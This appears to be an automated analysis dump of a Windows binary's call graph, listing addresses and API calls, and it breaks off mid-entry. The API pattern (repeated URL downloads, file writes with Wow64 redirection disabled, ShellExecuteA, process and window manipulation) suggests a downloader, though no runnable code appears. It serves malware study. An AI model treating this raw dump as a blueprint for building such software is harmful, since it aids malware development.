119882->119883 119981 100042d0 119883->119981 119886 1000419b 119886->119803 119887 100041cc 119888 10004203 119887->119888 119890 100041e9 GetProcessHeap HeapFree 119887->119890 119891 1000423e 119888->119891 119892 10004212 119888->119892 119893 10004243 119888->119893 119889 100041b1 GetProcessHeap HeapFree 119889->119803 119890->119803 120001 10006600 GetCurrentProcess IsWow64Process 119891->120001 120010 1000e41c GetSystemTimeAsFileTime 119892->120010 119893->119891 119897 1000e41c GetSystemTimeAsFileTime 119893->119897 119896 1000427f 119899 10004283 DeleteFileA GetProcessHeap HeapFree 119896->119899 119900 100042a5 GetProcessHeap RtlFreeHeap 119896->119900 119901 10004251 119897->119901 119898 10004219 120012 1000bf28 119898->120012 119899->119803 119900->119803 119903 1000bf28 16 API calls 119901->119903 119905 10004257 119903->119905 119905->119891 119907 1000bf07 16 API calls 119905->119907 119907->119905 119909 10004c91 SetFileAttributesA 119908->119909 119910 100040cd 119908->119910 119909->119910 119910->119802 119915 100051d6 119911->119915 119916 100040f3 119915->119916 120053 100086b0 119915->120053 119919->119820 119920->119826 119922 100101b2 _free 119921->119922 119923 10010189 HeapFree 119921->119923 119922->119829 119923->119922 119924 1001019e 119923->119924 119927 1001016b 14 API calls __dosmaperr 119924->119927 119926 100101a4 GetLastError 119926->119922 119927->119926 119928->119839 119929->119843 119930->119843 119932 1000be40 119931->119932 119933 1000be4e 119931->119933 119932->119933 119938 1000be65 119932->119938 119940 1001016b 14 API calls __dosmaperr 119933->119940 119935 1000be56 119941 1000e626 25 API calls ___std_exception_copy 119935->119941 119937 1000516b RegCloseKey 119937->119860 119938->119937 119942 1001016b 14 API calls __dosmaperr 119938->119942 119940->119935 119941->119937 119942->119935 119946 1000c23f 119943->119946 119945 10001053 119945->119779 119947 1000c24a 119946->119947 119948 1000c25f 119946->119948 119962 1001016b 14 API calls __dosmaperr 119947->119962 119950 1000c2a1 119948->119950 119953 1000c26d 119948->119953 119966 1001016b 14 API calls __dosmaperr 119950->119966 119952 1000c24f 119963 1000e626 25 API calls ___std_exception_copy 119952->119963 119964 1000bf3a 32 API calls 4 library calls 119953->119964 119954 1000c299 119967 1000e626 25 API calls ___std_exception_copy 119954->119967 119957 1000c25a 119957->119945 119958 1000c285 119960 1000c2b1 119958->119960 119965 1001016b 14 API calls __dosmaperr 119958->119965 119960->119945 119962->119952 119963->119957 119964->119958 119965->119954 119966->119954 119967->119960 119968->119873 119972 100029ad 119969->119972 119970 100029dc 119971 10008d24 CatchGuardHandler 5 API calls 119970->119971 119973 100029e9 119971->119973 119972->119970 119974 100029d5 CloseHandle 119972->119974 119976 100029ef 119972->119976 119973->119876 119974->119970 119975 10002a90 Process32NextW 119975->119976 119977 10002aac CloseHandle 119975->119977 119976->119975 119976->119977 119978 10008d24 CatchGuardHandler 5 API calls 119977->119978 119979 10002ac2 119978->119979 119979->119876 119980->119880 119982 10004314 119981->119982 119983 1000458b 119981->119983 119984 10004320 InternetOpenA 119982->119984 119987 10008d24 CatchGuardHandler 5 API calls 119983->119987 119985 10004576 Sleep 119984->119985 119986 1000446c InternetOpenUrlA 119984->119986 119985->119983 119985->119984 119988 1000448e GetProcessHeap RtlAllocateHeap 119986->119988 119990 10004488 119986->119990 119989 10004197 119987->119989 119988->119990 119991 100044ac InternetReadFile 119988->119991 119989->119886 119989->119887 119989->119889 119990->119985 119992 1000455c GetProcessHeap HeapFree 119991->119992 119995 100044c7 119991->119995 119992->119990 119993 100044d1 InternetCloseHandle 119993->119995 119994 100044eb GetProcessHeap HeapFree 119994->119985 119995->119983 119995->119992 119995->119993 119995->119994 119996 1000452c GetProcessHeap RtlAllocateHeap 119995->119996 119997 10004545 GetProcessHeap HeapFree 119996->119997 119998 100045a2 119996->119998 119997->119985 120018 100028f0 119998->120018 120002 10006633 Wow64DisableWow64FsRedirection 120001->120002 120003 10006669 CreateFileA 120001->120003 120004 10006641 CreateFileA Wow64RevertWow64FsRedirection 120002->120004 120005 100066ad 120002->120005 120006 10006686 120003->120006 120004->120006 120005->119896 120006->120005 120007 1000668b WriteFile 120006->120007 120008 100066b6 CloseHandle 120007->120008 120009 100066a7 CloseHandle 120007->120009 120008->119896 120009->120005 120011 1000e44e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 120010->120011 120011->119898 120022 10010570 GetLastError 120012->120022 120019 1000296c 120018->120019 120020 10008d24 CatchGuardHandler 5 API calls 120019->120020 120021 10002987 GetProcessHeap RtlFreeHeap 120020->120021 120021->119983 120023 1001058d 120022->120023 120024 10010587 120022->120024 120217 10001074 _strrchr 120209->120217 120210 100010fd Sleep 120211 10001114 120210->120211 120210->120217 120212 10004be0 GetSystemTimeAsFileTime 120212->120217 120214 100045f0 32 API calls 120214->120217 120215 100010a4 GetFileAttributesA 120215->120217 120216 1000be8d 25 API calls 120216->120217 120217->120210 120217->120212 120217->120214 120217->120215 120217->120216 120218 1000bee1 14 API calls ___std_type_info_destroy_list 120217->120218 120219 10001d70 36 API calls 120217->120219 120282 10001120 120217->120282 120218->120217 120219->120217 120221 100058da RegGetValueA 120220->120221 120233 10005c7a 120220->120233 120222 10005fe8 RegCloseKey 120221->120222 120223 1000590f RegCloseKey 120221->120223 120222->120233 120226 10005917 120223->120226 120224 10008d24 CatchGuardHandler 5 API calls 120225 10005fff 120224->120225 120294 10001000 120226->120294 120228 1000e41c GetSystemTimeAsFileTime 120236 10005b0e 120228->120236 120229 1000bf28 16 API calls 120229->120236 120230 1000bf07 16 API calls 120231 10005b35 Sleep 120230->120231 120232 100042d0 22 API calls 120231->120232 120232->120236 120233->120224 120234 10005c2c GetProcessHeap HeapFree 120234->120236 120235 10005c81 120237 10001000 32 API calls 120235->120237 120236->120228 120236->120229 120236->120230 120236->120233 120236->120234 120236->120235 120239 10005fb0 120237->120239 120240 10005fe4 120239->120240 120298 10003320 103 API calls 3 library calls 120239->120298 120240->120233 120242 100052d0 CreateToolhelp32Snapshot 120241->120242 120243 10005541 Sleep 120242->120243 120244 100052ea Process32FirstW 120242->120244 120243->120242 120245 1000553a CloseHandle 120244->120245 120247 10005309 120244->120247 120245->120243 120246 100053a9 FindWindowExA 120248 10005514 EnumWindows 120246->120248 120249 10005507 PostMessageW 120246->120249 120247->120246 120250 10005525 Process32NextW 120247->120250 120248->120250 120299 10004cb0 10 API calls CatchGuardHandler 120248->120299 120249->120248 120250->120245 120250->120247 120252 100061a2 120251->120252 120253 1000631c 120251->120253 120255 1000be33 ___std_exception_copy 25 API calls 120252->120255 120254 10008d24 CatchGuardHandler 5 API calls 120253->120254 120256 1000632e 120254->120256 120257 100061ba 120255->120257 120257->120257 120258 1000be33 ___std_exception_copy 25 API calls 120257->120258 120261 100061f9 _strrchr 120258->120261 120260 100062e5 120260->120253 120262 10004d60 14 API calls 120260->120262 120261->120253 120300 10004d60 GetCurrentProcess IsWow64Process 120261->120300 120263 10006303 120262->120263 120264 10006334 120263->120264 120265 10006307 GetProcessHeap HeapFree 120263->120265 120266 10004d60 14 API calls 120264->120266 120265->120253 120267 1000634e 120266->120267 120267->120253 120279 1000637a _strrchr 120267->120279 120268 10006380 GetFileAttributesA 120269 100063f6 GetFileAttributesA 120268->120269 120268->120279 120269->120279 120270 1000e41c GetSystemTimeAsFileTime 120270->120279 120271 10006472 GetFileAttributesA 120271->120279 120272 1000bf28 16 API calls 120272->120279 120273 100086e0 65 API calls 120273->120279 120274 10006600 9 API calls 120274->120279 120275 100065c0 Sleep 120275->120268 120276 1000bf07 16 API calls 120276->120279 120277 1000be8d 25 API calls 120277->120279 120278 100063e5 SetFileAttributesA 120278->120269 120279->120268 120279->120269 120279->120270 120279->120271 120279->120272 120279->120273 120279->120274 120279->120275 120279->120276 120279->120277 120279->120278 120280 100051c0 66 API calls 120279->120280 120281 1000bee1 ___std_type_info_destroy_list 14 API calls 120279->120281 120280->120279 120281->120279 120283 10002990 8 API calls 120282->120283 120284 1000115e 120283->120284 120285 10001d50 120284->120285 120286 10001166 120284->120286 120288 10008d24 CatchGuardHandler 5 API calls 120285->120288 120293 10006920 32 API calls 120286->120293 120290 10001d5c 120288->120290 120289 10001c52 ShellExecuteA 120291 10008d24 CatchGuardHandler 5 API calls 120289->120291 120290->120217 120292 10001d49 120291->120292 120292->120217 120293->120289 120295 10001019 120294->120295 120296 1000e3d4 32 API calls 120295->120296 120297 10001023 120296->120297 120297->120236 120298->120239 120301 10004d93 Wow64DisableWow64FsRedirection 120300->120301 120302 10004dc9 CreateFileA 120300->120302 120303 10004da1 CreateFileA Wow64RevertWow64FsRedirection 120301->120303 120304 10004deb 120301->120304 120305 10004de6 120302->120305 120303->120305 120304->120260 120305->120304 120306 10004df4 GetFileSize 120305->120306 120307 10004e05 GetProcessHeap RtlAllocateHeap 120306->120307 120308 10004e3d CloseHandle 120306->120308 120307->120308 120309 10004e1b ReadFile 120307->120309 120308->120260 120310 10004e2e GetProcessHeap HeapFree 120309->120310 120311 10004e4f CloseHandle 120309->120311 120310->120308 120311->120260 120312->119748 120313 4d006f 120328 4c93e0 120313->120328 120315 4d007a 120316 4d0081 120315->120316 120334 4c8001 59 API calls 120315->120334 120318 4d00db GetDesktopWindow 120316->120318 120331 4c95b9 120316->120331 120319 4d00ea GetWindow 120318->120319 120321 4d0112 120319->120321 120326 4d00f2 120319->120326 120323 4d00cd SendMessageA 120323->120318 120324 4d00a2 120324->120323 120325 4d00b5 SendMessageA 120324->120325 120325->120318 120326->120319 120327 4d00ff SendMessageA 120326->120327 120335 4cfd76 62 API calls 120326->120335 120327->120326 120329 4c93e7 GetWindowLongA 120328->120329 120330 4c93f3 120328->120330 120329->120315 120332 4c95ca 120331->120332 120333 4c95c0 IsWindowEnabled 120331->120333 120333->120324 120334->120316 120335->120326 120336 421a26 120337 421a30 __EH_prolog 120336->120337 120364 41ef1b 120337->120364 120339 421a42 120375 41ebe5 120339->120375 120345 421a5e 120346 41ec79 141 API calls 120345->120346 120347 421a6a 120346->120347 120348 4c5f18 ctype 67 API calls 120347->120348 120349 421a75 120348->120349 120350 41ec79 141 API calls 120349->120350 120351 421a81 lstrcpy lstrcpy 120350->120351 120413 40605f 29 API calls ctype 120351->120413 120353 421ada 120414 406c91 120353->120414 120357 421afe 120518 406086 29 API calls ctype 120357->120518 120359 421b0c 120519 4c5eaa 120359->120519 120524 4815f0 120364->120524 120366 41ef2b 120529 481770 120366->120529 120369 4815f0 141 API calls 120370 41ef41 120369->120370 120371 481770 141 API calls 120370->120371 120372 41ef49 120371->120372 120374 41ef6c 120372->120374 120533 481ae0 141 API calls 120372->120533 120374->120339 120376 41ebef __EH_prolog 120375->120376 120377 41ec55 120376->120377 120559 4c9c03 66 API calls ctype 120376->120559 120378 4c5eaa ctype 32 API calls 120377->120378 120380 41ec61 120378->120380 120382 4c5eaa ctype 32 API calls 120380->120382 120381 41ec1c 120381->120377 120560 4c2c3a 120381->120560 120384 41ec6d 120382->120384 120389 41ec79 120384->120389 120390 41ec83 __EH_prolog 120389->120390 120719 4813d0 120390->120719 120392 41eca4 120393 41ecf3 120392->120393 120726 4c9c03 66 API calls ctype 120392->120726 120394 4c5eaa ctype 32 API calls 120393->120394 120396 41ecff 120394->120396 120397 4c5eaa ctype 32 API calls 120396->120397 120400 41ed0b 120397->120400 120398 41ecb6 120398->120393 120399 4c2c3a 62 API calls 120398->120399 120401 41ecce 120399->120401 120405 4c5f18 120400->120405 120401->120393 120402 4c5c1f ctype 36 API calls 120401->120402 120403 41ece8 120402->120403 120727 46da16 141 API calls 2 library calls 120403->120727 120406 4c5f2c 120405->120406 120412 4c5f3f ctype 120405->120412 120407 4c5f36 120406->120407 120408 4c5f41 lstrlen 120406->120408 120730 4c9c03 66 API calls ctype 120407->120730 120410 4c5f4e 120408->120410 120408->120412 120411 4c5d17 ctype 31 API calls 120410->120411 120411->120412 120412->120345 120413->120353 120415 406c9b _rand __EH_prolog ctype 120414->120415 120416 4c6033 ctype 35 API calls 120415->120416 120417 406ced ctype 120416->120417 120731 4c5707 120417->120731 120420 406d41 ctype 120423 4c5707 ctype 48 API calls 120420->120423 120421 406d19 120749 4c564a 120421->120749 120425 406d61 120423->120425 120424 406d32 120429 4c5eaa ctype 32 API calls 120424->120429 120426 406da1 120425->120426 120427 406d68 120425->120427 120432 406de3 120426->120432 120433 406daa 120426->120433 120756 4c5922 38 API calls ctype 120427->120756 120431 406faa 120429->120431 120430 406d6d 120436 4c564a ctype 39 API calls 120430->120436 120517 41eea7 141 API calls 120431->120517 120744 407109 29 API calls ctype 120432->120744 120757 4c5922 38 API calls ctype 120433->120757 120439 406d86 120436->120439 120437 406df3 120440 406e35 120437->120440 120441 406dfb 120437->120441 120438 406db2 120758 4c5922 38 API calls ctype 120438->120758 120443 4c564a ctype 39 API calls 120439->120443 120446 406e8e 120440->120446 120453 406e54 120440->120453 120759 4c5922 38 API calls ctype 120441->120759 120487 406d92 120443->120487 120445 406dba 120449 4c564a ctype 39 API calls 120445->120449 120448 4c512e ctype 29 API calls 120446->120448 120447 406e03 120760 4c5922 38 API calls ctype 120447->120760 120451 406e94 120448->120451 120452 406dc6 120449->120452 120455 406ed8 120451->120455 120456 406e9c 120451->120456 120457 4c564a ctype 39 API calls 120452->120457 120761 4c5922 38 API calls ctype 120453->120761 120454 406e0b 120459 4c564a ctype 39 API calls 120454->120459 120470 406f01 120455->120470 120765 4c58d8 38 API calls ctype 120455->120765 120763 4c5922 38 API calls ctype 120456->120763 120457->120487 120461 406e5c 120762 4c5922 38 API calls ctype 120461->120762 120472 406e64 120487->120424 120517->120357 120518->120359 120525 4815f8 120524->120525 120526 481606 120524->120526 120525->120366 120534 4815a0 120526->120534 120530 481780 120529->120530 120546 48a7d0 120530->120546 120532 41ef36 120532->120369 120533->120374 120535 4815b9 120534->120535 120536 4815b3 120534->120536 120540 48c8d0 120535->120540 120544 489da0 141 API calls ctype 120536->120544 120541 48c8ea 120540->120541 120543 4815d5 120541->120543 120545 48c950 141 API calls ctype 120541->120545 120543->120366 120544->120535 120545->120543 120547 48a7e1 120546->120547 120552 48a7ec 120546->120552 120556 482a80 141 API calls ctype 120547->120556 120548 48a821 120558 48a940 141 API calls ctype 120548->120558 120550 48a7f8 ctype 120553 48a82f 120550->120553 120557 48a840 141 API calls ctype 120550->120557 120552->120548 120552->120550 120553->120532 120555 48a819 120555->120532 120556->120552 120557->120555 120558->120553 120559->120381 120569 4c28ed 120560->120569 120563 4c5c1f 120564 4c5c3c 120563->120564 120565 4c5c2e InterlockedIncrement 120563->120565 120704 4c6033 120564->120704 120566 41ec4a 120565->120566 120568 46da16 141 API calls 2 library calls 120566->120568 120568->120377 120581 4c2906 _rand ctype _wctomb_s 120569->120581 120570 4c2c0a 120583 4c62da 120570->120583 120576 4b0298 6 API calls 120576->120581 120578 4af2db 6 API calls 120578->120581 120580 4c2b2d lstrlen 120580->120581 120581->120570 120581->120576 120581->120578 120581->120580 120599 4b1d03 29 API calls ctype 120581->120599 120600 4b00aa 48 API calls ctype 120581->120600 120584 4c62ed 120583->120584 120588 4c2c17 120584->120588 120601 4c5d17 120584->120601 120586 4c6304 ctype 120608 4c5e12 32 API calls ctype 120586->120608 120589 4b547c 120588->120589 120666 4b8de9 120589->120666 120592 4b54b3 120594 4c6329 120592->120594 120697 4c5e53 120594->120697 120596 4c6331 120597 4c633a lstrlen 120596->120597 120598 41ec2f 120596->120598 120597->120598 120598->120377 120598->120563 120599->120581 120600->120581 120602 4c5d23 120601->120602 120604 4c5d2c 120601->120604 120602->120586 120603 4c5d34 120609 4a8f6c 120603->120609 120604->120603 120606 4c5d73 120604->120606 120616 4c512e 120606->120616 120608->120588 120620 4aef44 120609->120620 120611 4a8f76 RtlEnterCriticalSection 120612 4a8f94 120611->120612 120613 4a8fc5 RtlLeaveCriticalSection 120611->120613 120621 4c3bc1 29 API calls ctype 120612->120621 120613->120602 120615 4a8fa6 120615->120613 120618 4c5134 120616->120618 120619 4c5152 120618->120619 120622 4af1a1 120618->120622 120619->120602 120620->120611 120621->120615 120625 4af1b3 120622->120625 120626 4af1b0 120625->120626 120628 4af1ba _rand 120625->120628 120626->120618 120628->120626 120629 4af1df 120628->120629 120630 4af20c 120629->120630 120633 4af24f 120629->120633 120636 4af23a 120630->120636 120647 4b62f4 120630->120647 120632 4af2be RtlAllocateHeap 120643 4af241 120632->120643 120633->120636 120637 4af271 120633->120637 120634 4af222 120662 4b7333 5 API calls _rand 120634->120662 120636->120632 120636->120643 120639 4b62f4 ctype 28 API calls 120637->120639 120638 4af22d 120663 4af246 RtlLeaveCriticalSection ctype 120638->120663 120641 4af278 120639->120641 120664 4b7dd6 6 API calls 2 library calls 120641->120664 120643->120628 120644 4af28b 120665 4af2a5 RtlLeaveCriticalSection ctype 120644->120665 120646 4af298 120646->120636 120646->120643 120648 4b634a RtlEnterCriticalSection 120647->120648 120649 4b630c 120647->120649 120648->120634 120650 4af1a1 ctype 27 API calls 120649->120650 120651 4b6314 120650->120651 120652 4b6322 120651->120652 120653 4b21ae _rand 7 API calls 120651->120653 120654 4b62f4 ctype 27 API calls 120652->120654 120653->120652 120655 4b632a 120654->120655 120656 4b633b 120655->120656 120657 4b6331 RtlInitializeCriticalSection 120655->120657 120659 4af0b8 ___free_lc_time 27 API calls 120656->120659 120658 4b6340 120657->120658 120660 4b6355 ctype RtlLeaveCriticalSection 120658->120660 120659->120658 120661 4b6348 120660->120661 120661->120648 120662->120638 120663->120636 120664->120644 120665->120646 120667 4b54a9 120666->120667 120670 4b8e11 __aulldiv __aullrem _rand ctype 120666->120670 120667->120592 120675 4b8cd1 44 API calls ctype 120667->120675 120668 4b9587 44 API calls ctype 120668->120670 120669 4af1a1 ctype 29 API calls 120669->120670 120670->120667 120670->120668 120670->120669 120672 4b95bc 44 API calls ctype 120670->120672 120673 4b95ed 44 API calls ctype 120670->120673 120674 4b1e11 39 API calls ctype 120670->120674 120676 4af0b8 120670->120676 120672->120670 120673->120670 120674->120670 120675->120592 120677 4af192 120676->120677 120678 4af0e6 120676->120678 120677->120670 120679 4af0f0 120678->120679 120680 4af12b 120678->120680 120681 4b62f4 ctype 28 API calls 120679->120681 120683 4b62f4 ctype 28 API calls 120680->120683 120692 4af11c 120680->120692 120684 4af0f7 ___free_lc_time 120681->120684 120682 4af184 RtlFreeHeap 120682->120677 120689 4af137 ___free_lc_time 120683->120689 120685 4af111 120684->120685 120693 4b700a VirtualFree VirtualFree HeapFree ___free_lc_time 120684->120693 120694 4af122 RtlLeaveCriticalSection ctype 120685->120694 120688 4af163 120696 4af17a RtlLeaveCriticalSection ctype 120688->120696 120689->120688 120695 4b7d91 VirtualFree HeapFree VirtualFree ___free_lc_time 120689->120695 120692->120677 120692->120682 120693->120685 120694->120692 120695->120688 120696->120692 120698 4c5e6e ctype 120697->120698 120699 4c5e5f 120697->120699 120698->120596 120703 4c5de1 32 API calls ctype 120699->120703 120701 4c5e64 120702 4c5d17 ctype 31 API calls 120701->120702 120702->120698 120703->120701 120705 4c603f 120704->120705 120706 4c6043 lstrlen 120704->120706 120709 4c5fb6 120705->120709 120706->120705 120708 4c6053 120708->120566 120712 4c5e81 120709->120712 120711 4c5fc4 ctype 120711->120708 120713 4c5e91 120712->120713 120714 4c5ea5 120713->120714 120718 4c5de1 32 API calls ctype 120713->120718 120714->120711 120716 4c5e9d 120717 4c5d17 ctype 31 API calls 120716->120717 120717->120714 120718->120716 120721 4813e1 120719->120721 120720 4813ea 120720->120392 120721->120720 120728 48a760 141 API calls ctype 120721->120728 120723 481426 120723->120392 120724 481402 120724->120723 120729 489da0 141 API calls ctype 120724->120729 120726->120398 120727->120393 120728->120724 120729->120723 120730->120412 120784 4c5e35 120731->120784 120736 4c6033 ctype 35 API calls 120737 4c574d CreateFileA 120736->120737 120739 4c57ed 120737->120739 120740 406d15 120737->120740 120739->120740 120741 4c57f4 GetLastError 120739->120741 120740->120420 120740->120421 120742 4c5803 ctype 120741->120742 120743 4c6033 ctype 35 API calls 120742->120743 120743->120740 120744->120437 120750 4c5654 __EH_prolog 120749->120750 120751 4c5679 120750->120751 120752 4c5674 120750->120752 120753 4c5eaa ctype 32 API calls 120751->120753 120812 4c5922 38 API calls ctype 120752->120812 120755 4c5685 120753->120755 120755->120424 120756->120430 120757->120438 120758->120445 120759->120447 120760->120454 120761->120461 120762->120472 120785 4c5e3d 120784->120785 120786 4c5730 120784->120786 120787 4c6033 ctype 35 API calls 120785->120787 120788 4c5a33 120786->120788 120787->120786 120803 4aef44 120788->120803 120790 4c5a3d GetFullPathNameA 120791 4c5a60 lstrcpyn 120790->120791 120792 4c5a72 120790->120792 120801 4c573f 120791->120801 120804 4c5b03 120792->120804 120795 4c5aa3 120796 4c5aa9 CharUpperA 120795->120796 120797 4c5ab0 120795->120797 120796->120797 120799 4c5ab6 FindFirstFileA 120797->120799 120800 4c5ae2 120797->120800 120798 4c5eaa ctype 32 API calls 120798->120801 120799->120800 120802 4c5acb FindClose lstrcpy 120799->120802 120800->120798 120801->120736 120802->120800 120803->120790 120805 4c62da ctype 34 API calls 120804->120805 120806 4c5b15 ctype 120805->120806 120807 4c5b21 lstrcpyn 120806->120807 120808 4c5b34 ctype 120807->120808 120809 4c6329 ctype 35 API calls 120808->120809 120810 4c5a89 GetVolumeInformationA 120809->120810 120810->120795 120810->120800 120812->120751 120816 4c6c09 120823 4d490d 120816->120823 120819 4c6c67 120822 4c6c6b 120819->120822 120829 4c6aaa 120819->120829 120824 4d4917 __EH_prolog 120823->120824 120825 4c6c1d 120824->120825 120857 4d435c 120824->120857 120825->120819 120856 4c8910 7 API calls 120825->120856 120868 4aef44 120829->120868 120831 4c6ab4 GetPropA 120832 4c6b94 120831->120832 120833 4c6ae7 120831->120833 120834 4c69ad 58 API calls 120832->120834 120835 4c6af0 120833->120835 120836 4c6b73 120833->120836 120837 4c6b9c 120834->120837 120838 4c6b4f SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 120835->120838 120839 4c6af5 120835->120839 120840 4c69ad 58 API calls 120836->120840 120841 4c69ad 58 API calls 120837->120841 120843 4c6bb2 CallWindowProcA 120838->120843 120842 4c6b00 120839->120842 120839->120843 120844 4c6b79 120840->120844 120845 4c6ba4 120841->120845 120869 4c69ad 120842->120869 120847 4c6b3b 120843->120847 120890 4c676c 66 API calls 120844->120890 120891 4c670b 120845->120891 120847->120822 120851 4c6b8b 120852 4c6bae 120851->120852 120852->120843 120852->120847 120854 4c6b16 CallWindowProcA 120877 4c6692 120854->120877 120856->120819 120858 4d436c 120857->120858 120859 4d4367 120857->120859 120861 4d43c8 120858->120861 120862 4d43b9 RtlEnterCriticalSection 120858->120862 120863 4d4390 RtlEnterCriticalSection 120858->120863 120867 4d42c9 GetVersion RtlInitializeCriticalSection 120859->120867 120866 4d43cc RtlLeaveCriticalSection 120861->120866 120862->120861 120864 4d439e RtlInitializeCriticalSection 120863->120864 120865 4d43b1 RtlLeaveCriticalSection 120863->120865 120864->120865 120865->120862 120866->120825 120867->120858 120868->120831 120900 4c693b 120869->120900 120871 4c69b6 120908 4cb504 120871->120908 120873 4c69c3 120914 4c9665 120873->120914 120875 4c69cd 120876 4c666f GetWindowRect GetWindowLongA 120875->120876 120876->120854 120878 4c669f 120877->120878 120879 4c6706 120877->120879 120880 4c93e0 GetWindowLongA 120878->120880 120879->120847 120881 4c66a9 120880->120881 120881->120879 120882 4c66b0 GetWindowRect 120881->120882 120882->120879 120883 4c66c7 120882->120883 120883->120879 120884 4c66cf GetWindow 120883->120884 120885 4c69ad 58 API calls 120884->120885 120886 4c66e0 120885->120886 120887 4c66eb 120886->120887 120888 4c95b9 IsWindowEnabled 120886->120888 120887->120879 120955 4c8a45 120887->120955 120888->120887 120890->120851 120892 4c93e0 GetWindowLongA 120891->120892 120893 4c671d 120892->120893 120894 4c6765 120893->120894 120994 4c7fd9 120893->120994 120894->120852 120896 4c672b 120897 4c7fd9 62 API calls 120896->120897 120898 4c6737 120897->120898 120898->120894 120899 4c6750 SendMessageA 120898->120899 120899->120894 120901 4c6945 __EH_prolog 120900->120901 120918 4d3761 120901->120918 120903 4c694b ctype 120904 4c512e ctype 29 API calls 120903->120904 120906 4c6989 ctype 120903->120906 120905 4c696d 120904->120905 120905->120906 120923 4cb49f 29 API calls 2 library calls 120905->120923 120906->120871 120909 4cb50e __EH_prolog ctype 120908->120909 120910 4cb583 120909->120910 120913 4cb51f ctype 120909->120913 120953 4c23d5 RaiseException ctype 120909->120953 120954 4c4cf2 29 API calls ctype 120910->120954 120913->120873 120915 4c966c 120914->120915 120916 4c9688 ctype 120914->120916 120915->120916 120917 4c9672 GetParent 120915->120917 120916->120875 120917->120916 120924 4d373b 120918->120924 120923->120906 120925 4d4878 ctype 21 API calls 120924->120925 120926 4d374a 120925->120926 120927 4d3760 120926->120927 120928 4d490d ctype 7 API calls 120926->120928 120929 4d4878 120927->120929 120928->120927 120930 4d48ae TlsGetValue 120929->120930 120931 4d4881 120929->120931 120932 4d48c1 120930->120932 120936 4d489b 120931->120936 120950 4d4478 RaiseException TlsAlloc RtlInitializeCriticalSection ctype 120931->120950 120934 4d3777 120932->120934 120938 4d48d4 120932->120938 120934->120903 120940 4d4511 RtlEnterCriticalSection 120936->120940 120937 4d48ac 120937->120930 120951 4d4680 8 API calls ctype 120938->120951 120942 4d4530 120940->120942 120941 4d45ec ctype 120945 4d4601 RtlLeaveCriticalSection 120941->120945 120942->120941 120943 4d457d GlobalHandle GlobalUnlock GlobalReAlloc 120942->120943 120944 4d456a GlobalAlloc 120942->120944 120946 4d459f 120943->120946 120944->120946 120945->120937 120947 4d45ad GlobalHandle GlobalLock RtlLeaveCriticalSection 120946->120947 120948 4d45c8 GlobalLock 120946->120948 120952 4c23d5 RaiseException ctype 120947->120952 120948->120941 120950->120936 120951->120934 120954->120913 120956 4c93e0 GetWindowLongA 120955->120956 120957 4c8a58 120956->120957 120958 4c8a62 120957->120958 120960 4c8a6d GetParent 120957->120960 120961 4c8a78 GetWindow 120957->120961 120959 4c8a9f GetWindowRect 120958->120959 120963 4c8ab8 120959->120963 120964 4c8b43 GetParent GetClientRect GetClientRect MapWindowPoints 120959->120964 120962 4c8a83 120960->120962 120961->120962 120962->120959 120967 4c8a89 SendMessageA 120962->120967 120965 4c8abc GetWindowLongA 120963->120965 120966 4c8acc 120963->120966 120974 4c8b70 120964->120974 120965->120966 120968 4c8b1a GetWindowRect 120966->120968 120969 4c8ae0 120966->120969 120967->120959 120970 4c8a9d 120967->120970 120992 4a6dc1 14 API calls 120968->120992 120989 40f916 28 API calls ctype 120969->120989 120970->120959 120973 4c8ae5 120990 4a6dc1 14 API calls 120973->120990 120985 4c9543 120974->120985 120975 4c8b2d 120993 4a6e2c 12 API calls 120975->120993 120978 4c8b33 CopyRect 120978->120974 120981 4c8af8 120991 4a6e2c 12 API calls 120981->120991 120984 4c8afe CopyRect CopyRect 120984->120974 120986 4c8bf3 120985->120986 120987 4c954d SetWindowPos 120985->120987 120986->120879 120987->120986 120989->120973 120990->120981 120991->120984 120992->120975 120993->120978 120995 4c7fe4 120994->120995 120997 4c7fdd 120994->120997 120995->120896 120997->120995 120998 4c7ff9 120997->120998 121001 4c7f94 62 API calls 120997->121001 120999 4c69ad 58 API calls 120998->120999 121000 4c7fff 120999->121000 121000->120896 121001->120997 121002 416307 121005 47e64a LoadLibraryA 121002->121005 121004 41630f 121005->121004 121006 4c6c85 121007 4d4878 ctype 21 API calls 121006->121007 121008 4c6c9a 121007->121008 121009 4c6cba 121008->121009 121010 4c6ca3 CallNextHookEx 121008->121010 121011 4d373b ctype 28 API calls 121009->121011 121012 4c6e72 121010->121012 121013 4c6cca 121011->121013 121014 4c6d3f 121013->121014 121015 4c6cf3 GetClassLongA 121013->121015 121032 4c6de2 CallNextHookEx 121013->121032 121018 4c6d47 121014->121018 121019 4c6df0 GetWindowLongA 121014->121019 121016 4c6d07 121015->121016 121015->121032 121021 4c6d2b lstrcmpiA 121016->121021 121022 4c6d14 GlobalGetAtomNameA 121016->121022 121039 4c69f2 58 API calls ctype 121018->121039 121020 4c6e00 GetPropA 121019->121020 121019->121032 121025 4c6e13 SetPropA GetPropA 121020->121025 121020->121032 121021->121014 121021->121032 121022->121021 121024 4c6e65 UnhookWindowsHookEx 121024->121012 121026 4c6e27 GlobalAddAtomA 121025->121026 121025->121032 121027 4c6e3c 121026->121027 121028 4c6e41 SetWindowLongA 121026->121028 121027->121028 121028->121032 121029 4c6dcd 121031 4c6dd2 SetWindowLongA 121029->121031 121030 4c6d4f 121030->121029 121040 4c67e2 121030->121040 121031->121032 121032->121012 121032->121024 121035 4c6d99 121036 4c6d9e GetWindowLongA 121035->121036 121037 4c6dbb 121036->121037 121037->121032 121038 4c6dbf SetWindowLongA 121037->121038 121038->121032 121039->121030 121041 4c67ec __EH_prolog 121040->121041 121042 4d4878 ctype 21 API calls 121041->121042 121043 4c6804 121042->121043 121044 4c6861 121043->121044 121059 4c666f GetWindowRect GetWindowLongA 121043->121059 121050 4c786d 121044->121050 121047 4c688a 121047->121029 121047->121035 121048 4c6692 95 API calls 121048->121047 121060 4c78b1 121050->121060 121127 4d0816 121050->121127 121133 4d06b4 121050->121133 121139 4d029e 121050->121139 121144 4c6914 121050->121144 121051 4c788f 121052 4c6872 121051->121052 121149 4c728c 121051->121149 121052->121047 121052->121048 121059->121044 121063 4c78bb __EH_prolog 121060->121063 121061 4c78d2 121061->121051 121062 4c792f 121065 4c794c 121062->121065 121066 4c7934 121062->121066 121063->121061 121063->121062 121064 4c69ad 58 API calls 121063->121064 121067 4c7925 121064->121067 121071 4d435c ctype 6 API calls 121065->121071 121165 4c676c 66 API calls 121066->121165 121069 4c670b 64 API calls 121067->121069 121069->121062 121070 4c7944 